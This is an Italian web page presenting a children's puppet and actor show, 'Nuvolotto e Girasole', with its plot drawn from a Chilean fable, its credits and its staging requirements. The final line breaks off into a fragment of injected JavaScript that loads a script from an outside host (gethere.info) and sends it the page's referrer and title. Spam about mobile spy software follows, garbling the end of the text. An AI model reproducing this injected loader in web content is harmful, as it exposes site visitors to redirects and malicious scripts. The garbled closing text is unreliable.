Nuvolotto e Girasole

Spettacolo di teatro di figura e teatro d’attore per bambini delle scuole materne

Drammaturgia: Barbara Sinicco
Elaborazioni musicali: Chiara Minca

Tratto da una favola tradizionale cilena, “Nuvolotto e il girasole” è una storia sulla fiducia e l’affetto tra le persone e i loro sogni.
Juan e Pepita sono una povera coppia di vecchietti a cui viene regalato un semino di girasole. Il contadino dice loro di avere pazienza e il girasole diventerà molto utile alla loro sopravvivenza.
Ma bisogna aver fiducia…Interviene poi un personaggio un po’ bizzarro, Nuvolotto, signore delle nuvole e facile a commuoversi, che aiuterà Juan e Pepita proprio grazie al girasole. Ma la vecchia e perfida comare si metterà ben presto in mezzo a causare brutti scherzi ai nostri vecchietti…
Musica e canzoni tradizionali cilene coinvolgeranno i bambini nell’atmosfera di un altro paese, dando così l’occasione, attraverso la magia del teatro, di avvicinarsi alla scoperta di altre parti del mondo.

Dati tecnici

Genere: teatro con pupazzi e teatro d’attore
Musica eseguita dal vivo
Durata: 40 minuti
Numero attori: 2
Tempi montaggio/smontaggio: 45 min.
Spazio necessario: min. 4×4 per attori e scenografia, per i bambini uno spazio sufficiente ad ad accoglierli seduti a terra.

Illuminazione ed acustica adeguate per il buon svolgimento dello spettacolo.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }} else {The most popular 2017 spy software applications for the mobile phones.